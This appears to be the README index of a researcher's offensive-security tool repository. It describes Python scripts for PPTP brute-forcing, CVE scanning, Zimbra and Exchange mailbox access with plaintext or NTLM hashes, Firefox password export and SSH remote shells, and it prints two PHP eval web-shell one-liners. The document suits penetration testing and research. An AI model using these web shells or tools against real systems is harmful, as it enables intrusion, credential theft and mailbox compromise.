Python codes of my blog.

Use Brute-force attack to get the password of PPTP VPN.

It'll read the passwords in file(named wordlist) and then use pptpsetup to connect to the server.

The time interval is 10 seconds.

Use to scan port.

The timeout is 3 seconds.

c++ version：

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp

Use to get ip from url.

I can use the result of Sublist3r directly.

Use to remove duplicate ip from the result of Sublist3r.

I can use the result of urltoip.py directly.

The IP can be sorted by using Sublime(F9).

Use to remove duplicate items from file.

Reference:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html

Used to call fofa's api and print the IP from the results.

You can get 100 results.

Used to call fofa's api and print the IP from the results.

If you're VIP,you'll get 10000 results.

Reference:

https://seclists.org/fulldisclosure/2019/Sep/31

Eg.

echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

Reference:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

Eg.

system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

Use to export the password of the Firefox

Use to get the version of Exchange.

First get the BuildNumber through the souce code of the URL and then get the version.

Reference:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019

Use to scan the SMBv3 RCE vulnerability.

The timeout is 3 seconds.

Reference:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI..

Affected Products:

• Vigor300B <v1.5.1
• Vigor2960 <v1.5.1
• Vigor3900 <v1.5.1

Use Zimbra SOAP API to connect the Zimbra mail server.

Usage:

  Zimbra_SOAP_API.py <url> <username> <password> <mode>

mode:

• low auth for low token
• admin auth for admin token
• ssrf Use CVE-2019-9621 to get the admin token

Eg:

  Zimbra_SOAP_API.py https://192.168.1.1 user1@mail.zimbra password low

Support command of low token:

• GetAllAddressLists
• GetContacts
• GetFolder
• GetItem ,Eg:GetItem /Inbox
• GetMsg ,Eg:GetMsg 259

Support command of admin token:

• GetAllDomains
• GetAllMailboxes
• GetAllAccounts
• GetAllAdminAccounts
• GetMemcachedClientConfig
• GetLDAPEntries ,Eg:GetLDAPEntries cn=* dc=zimbra,dc=com
• getalluserhash ,Eg:getalluserhash dc=zimbra,dc=com

Use to check the valid account of Exchange Web Service(Support plaintext and ntlmhash)

Reference:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

Usage:

checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

Eg.

checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

Use to access Autodiscover.xml and get the user's configuration(Support plaintext and ntlmhash)

Usage:

checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

Eg.

checkAutodiscover.py 192.168.1.1 443 plaintext user1@test.com password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash user1@test.com c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

Extra mode of checkAutodiscover.py

Add a parameter

Use to access Exchange Web Service(Support plaintext and ntlmhash)

Usage:

ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname

Eg.

ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

Use to check the valid credential of SSH(Support password and privatekeyfile)

Usage:

sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

Eg.

sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

Remote command execution via SSH(Support password and privatekeyfile)

Usage:

sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

Eg.

sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

Use to check the valid credential of eas(Exchange Server ActiveSync)

Usage:

easCheck.py <host> <user> <password>

Eg.

easCheck.py 192.168.1.1 user1 password1

Use to check the valid account of Exchange by connecting to OWA.

Usage:

checkOWA.py <url> <user> <password>

Use to read mails by connecting to OWA.

Usage:

owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment